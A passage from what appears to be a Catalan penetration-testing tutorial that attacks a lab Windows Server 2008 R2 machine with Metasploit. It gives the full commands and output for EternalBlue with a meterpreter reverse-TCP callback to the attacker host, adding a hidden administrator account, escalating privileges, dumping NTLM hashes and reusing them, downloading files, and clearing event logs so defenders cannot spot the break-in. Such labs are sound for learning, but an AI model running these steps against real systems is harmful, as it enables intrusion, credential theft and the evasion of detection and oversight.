Després d'unes quantes hores ha acabat el procés amb èxit. Ha trobat dos usuaris i contrasenyes que coincideixen amb les llistes que li hem proporcionat: "vagrant:vagrant" i "administrator:vagrant". Ara que ja hem aconseguit les credencials de dos usuaris, i com que hem habilitat prèviament l'opció perquè les guardi a la base de dades, les podem veure sempre que ho necessitem amb la comanda "creds":

```
msf5 auxiliary(scanner/smb/smb_login) > creds
Credentials
===========

host          origin        service        public         private  realm  private_type  JtR Format
----          ------        -------        ------         -------  -----  ------------  ----------
192.168.0.21  192.168.0.21  445/tcp (smb)  vagrant        vagrant         Password      
192.168.0.21  192.168.0.21  445/tcp (smb)  administrator  vagrant         Password  
```

Com podem veure, aquesta comanda ens permet visualitzar les credencials que tenim emmagatzemades a la nostra base de dades. Podem consultar a quin host pertanyen les credencials, a quin servei o port, l'usuari i la contrasenya per accedir-hi.


## 3. Obtenir el control del dispositiu:


### 3.1. Control a partir de l'exploit ms17_010_eternalblue

Primer de tot mirarem com obtenir el control partint del punt on ens vam quedar a l'anterior part, [2.Accés als dispositius descoberts](./2_acces_dispositius_descoberts.md). Seguint des d'aquell punt, ara mateix el que tenim és una sessió oberta a la màquina objectiu (windows en aquest cas). Primer de tot el que farem és mirar quin usuari som per tal de veure quins són els nostres privilegis, és a dir, si som un usuari normal, tenim permisos d'administrador o algun altre permís en especial:

```
C:\Windows\system32>whoami
whoami
nt authority\system
```

Com podem veure, en aquest cas som l'usuari ```nt authority\system```. Aquest és un usuari que té permisos d'administrador i sobre tot el sistema, de manera que en aquest cas no necessitarem escalar privilegis per tal de poder obtenir-ne el control.

Un cop ja sabem qui som i que podem fer podríem mirar quins altres usuaris hi ha a la màquina que estem atacant. D'aquesta manera obtindrem informació de la màquina i a més, en el cas de voler executar un atac de diccionari a algun dels usuaris de la màquina, podem reduir considerablement el temps d'aquest atac si ja sabem quin usuari en concret volem atacar:

```
C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    sshd                     
sshd_server              vagrant                  
```

Com podem veure, hi ha 5 usuaris en aquesta màquina. Pel nom d'algun d'aquests usuaris, podríem sospitar que no tots podrien ser usuaris actius, i per tant alguns només s'utilitzarien per executar processos en el seu nom. Podem comprovar quins d'aquests usuaris són actius per saber amb quins podríem arribar a iniciar sessió:

```
C:\Windows\system32>net user vagrant
net user vagrant
User name                    vagrant
Full Name                    vagrant
Comment                      Vagrant User
User's comment               
Country code                 001 (United States)
Account active               Yes
Account expires              Never

Password last set            5/4/2020 6:09:25 AM
Password expires             Never
Password changeable          5/4/2020 6:09:25 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/4/2020 7:45:42 AM

Logon hours allowed          All

Local Group Memberships      *Users                
Global Group memberships     *None                 
The command completed successfully.
```

Ara que sabem els noms dels usuaris, a part de veure si són comptes actius o no, podem veure la seva informació (nom complet, privilegis o permisos, etc.). En aquest cas només els usuaris "Administrator" i "Vagrant" són comptes actius.

 Donada aquesta situació, una manera d'assegurar-nos l'accés a aquesta màquina podria ser creant un usuari propi, o canviant la contrasenya d'algun dels usuaris existents, ja que si s'actualitzés la màquina podríem perdre aquesta vulnerabilitat i per tant no podríem tornar a utilitzar aquest accés. Totes dues opcions són bastant ràpides de detectar. Si volguéssim que no se'ns detectés tan fàcilment, podríem intentar aconseguir la contrasenya d'algun usuari administrador mitjançant un atac de diccionari. En aquest cas el que farem serà crear un usuari propi, ja que no ens preocupa que es detecti aquest usuari creat:

 ```
C:\Windows\system32>net user /add test Abc12345
net user /add test Abc12345
The command completed successfully.
```

Un cop creem l'usuari, ens assegurem que té permisos d'administrador:

```
C:\Windows\system32>net localgroup administrators test /add                  
net localgroup administrators test /add
The command completed successfully.
```

Un cop creat l'usuari i assignats els permisos d'administrador, comprovem que podem obrir una sessió remota amb aquest usuari creat, per exemple per ssh:

```
kali@kali:~$ ssh test@192.168.0.21
test@192.168.0.21's password: 
Last login: Mon May  4 08:25:11 2020 from 192.168.0.19
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\OpenSSH\home\test>whoami
vagrant-2008r2\test
```


### 3.2. Control a partir d'un compte d'usuari sense permisos d'administrador (escalar privilegis amb "getsystem")


En el cas que amb la comanda anterior no puguem accedir directament a un usuari amb privilegis, haurem de buscar una manera d'obtenir aquests privilegis.

Primer de tot, utilitzarem el mateix mòdul que a l'anterior punt (ms17_010_eternalblue) per aprofitar la vulnerabilitat, però canviant el payload a utilitzar. El payload és la càrrega o programa que executem a la vulnerabilitat que estem aprofitant, una vegada hem accedit a ella. Podem veure els payloads que tenim amb la comanda "show payloads":

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   generic/custom                                               normal  No     Custom Payload
   1   generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
   3   windows/x64/exec                                             normal  No     Windows x64 Execute Command
   4   windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
   5   windows/x64/messagebox                                       normal  No     Windows MessageBox x64
   6   windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   20  windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
   21  windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
   22  windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
   23  windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   24  windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   25  windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   26  windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   27  windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   28  windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   29  windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   30  windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   31  windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   32  windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
   33  windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
   34  windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   35  windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   36  windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   37  windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   38  windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   39  windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   40  windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   41  windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   42  windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   43  windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   44  windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   45  windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   46  windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
```

Aquests són tots els payloads que podem utilitzar ara mateix. En aquest cas agafarem el payload "windows/x64/meterpreter/reverse_tcp" amb la següent comanda:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
```

Un cop seleccionat el payload, veurem que amb la comanda "show options", no només podrem veure les opcions del mòdul, sinó que també les del payload:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.0.21     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
```

Per aquest payload només haurem de configurar la variable "LHOST", la qual serà la nostra pròpia ip (la del dispositiu atacant). En aquest cas ho hem de fer així, ja que el payload que hem carregat és el "reverse_tcp", de manera que com indica el nom, la connexió es realitza a la inversa. És a dir, la connexió es realitza de la màquina atacada (192.168.0.21) a la màquina atacant o pròpia (192.168.0.19). En aquest cas triem aquest payload, ja que generalment és més probable que els firewalls tinguin més connexions entrants bloquejades que no pas de sortida, ja que aquestes regles acostumen a ser més permissives.

Configurem la variable LHOST amb la ip de la màquina atacant:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.19
LHOST => 192.168.0.19
```

Un cop tenim tant el mòdul com el payload configurat, l'executem:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.0.19:4444 
[*] 192.168.0.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.21:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.21:445 - Connecting to target for exploitation.
[+] 192.168.0.21:445 - Connection established for exploitation.
[+] 192.168.0.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.21:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.0.21:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.0.21:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
[*] 192.168.0.21:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.0.21:445 - 0x00000030  6b 20 31                                         k 1             
[+] 192.168.0.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.21:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.0.21:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.21:445 - Starting non-paged pool grooming
[+] 192.168.0.21:445 - Sending SMBv2 buffers
[+] 192.168.0.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.21:445 - Sending final SMBv2 buffers.
[*] 192.168.0.21:445 - Sending last fragment of exploit packet!
[*] 192.168.0.21:445 - Receiving response from exploit packet
[+] 192.168.0.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.21:445 - Sending egg to corrupted connection.
[*] 192.168.0.21:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.0.21
[*] Meterpreter session 5 opened (192.168.0.19:4444 -> 192.168.0.21:49159) at 2020-05-05 11:17:34 -0400
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

```

Veurem que la consola ha canviat de nou en finalitzar l'exploit, però en aquest cas no tindrem la consola de Windows sinó que tenim una consola de "meterpreter". Meterpreter és el payload que acabem d'executar, però a més té una consola que ens permet fer diverses comandes per tal d'obtenir informació o poder manipular el sistema. Un cop ja tenim una sessió oberta a la màquina objectiu amb una consola de meterpreter, podem utilitzar la següent ordre per escalar privilegis:

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
```

Un cop finalitza aquesta comanda, podem comprovar que som l'usuari ```NT AUTHORITY\SYSTEM```, el qual té privilegis i permisos d'administrador:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### 3.3. Control a partir d'un compte d'usuari sense permisos d'administrador (escalar privilegis amb un exploit)


Pot donar-se el cas que el mètode anterior no funcionés, i el sistema no ens permeti obtenir privilegis. Si arribem en aquest punt, podem utilitzar un exploit per tal d'obtenir els privilegis. Seguint des de la mateixa consola de meterpreter, el primer que farem és deixar aquesta sessió en segon pla amb la comanda "background":

```
meterpreter > background
[*] Backgrounding session 5...
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
```

Com podem veure hem tornat a la consola de metasploit. Aquesta ordre ens ha deixat la sessió oberta a la màquina objectiu, en segon pla. De manera que podem utilitzar la mateixa sessió que ja tenim creada per enviar altres exploits a través d'ella. El número que ens ha mostrat l'ordre a la sortida és el número de sessió, però en el cas que tinguem més sessions o que no recordem el número, podem veure les sessions que tenim obertes amb l'ordre "sessions":

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  5         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ VAGRANT-2008R2  192.168.0.19:4444 -> 192.168.0.21:49159 (192.168.0.21)
```

Ara que ja tenim la sessió en segon pla, carregarem el mòdul que utilitzarem per guanyar privilegis (ms10_015_kitrap0d):

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/ms10_015_kitrap0d 
msf5 exploit(windows/local/ms10_015_kitrap0d) > 
```

Si mirem les opcions del mòdul, veurem que només requereix un número de sessió per funcionar, ja que aquest exploit treballa a través de sessions que ja estan creades:

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.19     yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)a
```

Establim la sessió que li pertany a la variable "SESSIONS":

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 5
SESSION => 5
```

Un cop ja hem configurat això, hem de carregar i configurar el payload "reverse_tcp" (No cal fer-ho de nou si ja s'ha fet abans):

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 192.168.0.19
lhost => 192.168.0.19
```

Un cop configurat, ja podem executar l'exploit:

```
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.0.19:4443 
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
```

En aquest cas, veiem que l'exploit ha acabat però ens ha retornat un error, ja que la sessió que li hem indicat ja pertanyia a un usuari amb privilegis, i per tant no podia elevar-los més. En el cas que fem aquesta prova amb un usuari que no tingui privilegis, la sortida hauria de ser semblant a la següent:

```
msf exploit(windows/local/ms10_015_kitrap0d) > run

[*]  Started reverse handler on 192.168.0.19:4443 
[*]  Launching notepad to host the exploit...
[+]  Process 4048 launched.
[*]  Reflectively injecting the exploit DLL into 4048...
[*]  Injecting exploit into 4048 ...
[*]  Exploit injected. Injecting payload into 4048...
[*]  Payload injected. Executing exploit...
[+]  Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*]  Sending stage (769024 bytes) to 192.168.0.21
[*]  Meterpreter session 2 opened (192.168.0.19:4443 -> 192.168.0.21:49204) at 2020-05-05 17:55:38 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Com podem veure, l'exploit finalment ens ha obert una altra sessió amb l'usuari ```NT AUTHORITY\SYSTEM```.


## 4. Recollir informació:

Un cop arribats a aquest punt, ja podem extreure la informació del dispositiu atacat. Però com que la informació que es pot arribar a extreure d'un ordinador és molt àmplia, mostrarem alguns dels casos a tenir en compte:


### 4.1. Extracció de credencials mitjançant exploits

El que farem en aquest cas, és obrir una consola de meterpreter (igual que al punt anterior) a la màquina objectiu. Un cop la tenim oberta, podem utilitzar el mòdul "credential_collector" de meterpreter:

```
meterpreter > run post/windows/gather/credentials/credential_collector 

[*] Running module against VAGRANT-2008R2
[+] Collecting hashes...
    Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: sshd:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: sshd_server:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035
    Extracted: test:aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9
    Extracted: vagrant:aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    VAGRANT-2008R2\sshd_server
    VAGRANT-2008R2\vagrant
    NT AUTHORITY\ANONYMOUS LOGON
```

Com podem veure, a la primera part de la sortida de la comanda, el mòdul ha extret diferents usuaris i contrasenyes. Els noms dels usuaris els podem llegir sense cap problema (Administrator, Guest, etc.), però les contrasenyes no, ja que el que hem obtingut és el seu hash. Encara que no les puguem llegir, les podem utilitzar per entrar mitjançant altres exploits. Farem la prova amb el mòdul smb_login (mòdul amb el qual es va fer l'atac de diccionari):

Primer de tot carreguem el mòdul "smb_login":

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > 
```

Després mirem les credencials obtingudes amb l'ordre "creds":

```
msf5 auxiliary(scanner/smb/smb_login) > creds
Credentials
===========

host          origin        service        public         private                                                            realm  private_type  JtR Format
----          ------        -------        ------         -------                                                            -----  ------------  ----------
192.168.0.21  192.168.0.21  445/tcp (smb)  vagrant        aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9  .      NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  vagrant        aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  administrator  aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  Administrator  aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  Guest          aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  sshd           aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  sshd_server    aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  test           aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9         NTLM hash     nt,lm
192.168.0.21  192.168.0.21  445/tcp (smb)  guest          aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
```

Un cop ja sabem amb quin usuari volem entrar, establim l'usuari i contrasenya:

```
msf5 auxiliary(scanner/smb/smb_login) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(scanner/smb/smb_login) > set smbpass aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
smbpass => aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
```

Indiquem l'adreça ip a la qual ataquem:

```
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.0.21
srhosts => 192.168.0.21
```

I finalment executem l'exploit:

```
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.0.21:445      - 192.168.0.21:445 - Starting SMB login bruteforce
[+] 192.168.0.21:445      - 192.168.0.21:445 - Success: '.\administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b' Administrator
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Com podem veure, l'exploit ens ha retornat un estatus de "success" amb la combinació d'usuari i contrasenya que hem introduït.


### 4.2. Descarregar directoris o fitxers

Una altra manera d'obtenir informació de la màquina objectiu, és descarregant els directoris que té creats. Això ho podem fer amb el mateix client de meterpreter.

Primer de tot hem de tenir una consola de meterpreter oberta a la màquina objectiu. Un cop tenim això, podem utilitzar la comanda "download", acompanyada de la ruta del fitxer o directori per descarregar-lo:

```
meterpreter > download c:\\testing
[*] downloading: c:\testing\testfile.txt -> testing/testfile.txt
[*] download   : c:\testing\testfile.txt -> testing/testfile.txt
```

Els fitxers descarregats els podem trobar al home del nostre usuari:

```
root@kali:~# pwd
/root
root@kali:~# ls
testing
```

En el cas que no sapiguem quins fitxers hi ha a la màquina, o quina és la ruta completa, podem utilitzar les comandes "ls", "pwd", i "cd" al client de meterpreter com si fos un sistema linux, per navegar dins la màquina objectiu:

```
meterpreter > cd c:\\users
meterpreter > ls
Listing: c:\users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2020-04-29 11:35:47 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  All Users
40555/r-xr-xr-x   8192  dir   2009-07-13 23:20:08 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 23:20:08 -0400  Public
100666/rw-rw-rw-  174   fil   2009-07-14 00:57:55 -0400  desktop.ini
40777/rwxrwxrwx   8192  dir   2020-04-29 11:30:30 -0400  sshd_server
40777/rwxrwxrwx   8192  dir   2020-05-04 11:25:11 -0400  test
40777/rwxrwxrwx   8192  dir   2020-04-29 20:23:24 -0400  vagrant

meterpreter > pwd
c:\users
```

O la comanda "search" si no sabem on es troba exactament el fitxer però si sabem quin nom té:

```
meterpreter > search -f testfile.txt
Found 1 result...
    c:\testing\testfile.txt
```

### 4.3. Buscar més vulnerabilitats a nivell local


També podem aprofitar l'accés que tenim dins aquesta màquina per tal d'extreure informació sobre les vulnerabilitats que té a nivell local. Això ho farem amb el mòdul "local_exploit_suggester". Aquest mòdul escaneja el sistema per buscar vulnerabilitats que es puguin explotar amb metasploit, i després fa suggeriments sobre quins exploits es podrien utilitzar sobre aquesta màquina.

Primer de tot, hem de tenir una sessió oberta a la màquina objectiu en segon pla. Un cop la tinguem, carreguem el mòdul:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) >
```

Si mirem les opcions de configuració del mòdul, veurem que només ens demana el número de sessió, per tant li assignem la sessió de la màquina que volem atacar:

```
msf5 post(multi/recon/local_exploit_suggester) > set session 5
session => 5
```

Un cop configurat el mòdul, l'executem:

```
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.0.21 - Collecting local exploits for x64/windows...
[*] 192.168.0.21 - 13 exploit checks are being tried...
[+] 192.168.0.21 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
```
Com podem veure, el resultat de l'exploit ens indica quins altres mòduls podríem utilitzar en aquesta màquina a nivell local.


## 5. Netejar el rastre

Un punt important i que hauríem de tenir en compte, és de deixar el mínim de "rastre" o informació possible sobre el que hem fet, i en el cas que en deixem, eliminar-lo. Aquest punt és bastant important, ja que si algú s'adonés del que hem fet, podria trobar com s'hi ha produït l'accés a la màquina, o quina vulnerabilitat del sistema hem aprofitat i protegir-la, de manera que no podríem tornar a accedir per aquella vulnerabilitat.

### 5.1. Esborrar els logs amb "clearev" (Windows)

En aquest cas, una de les eines que podem utilitzar per a eliminar el rastre que puguem haver deixat és una de les comandes de meterpreter (clearev). Aquesta comanda elimina els logs d'aplicacions, els del sistema i els de seguretat d'un sistema Windows. Només necessitem tenir una consola de meterpreter oberta a la màquina objectiu:

```
meterpreter > clearev
[*] Wiping 100 records from Application...
[*] Wiping 425 records from System...
[*] Wiping 176 records from Security...
```

Com veiem, la comanda ha eliminat bastants registres. Com que en aquest cas estem atacant una màquina pròpia, ho podem mirar des del punt de vista de la màquina atacada. A continuació tenim dues imatges sobre els logs del sistema, una abans d'esborrar els registres i una després d'executar la comanda amb meterpreter:


Logs del sistema abans d'executar la comanda:

![alt text](./aux/logs_before.PNG "Logs abans de la comanda")

Logs del sistema després d'executar la comanda:

![alt text](./aux/logs_after.PNG "Logs després de la comanda")



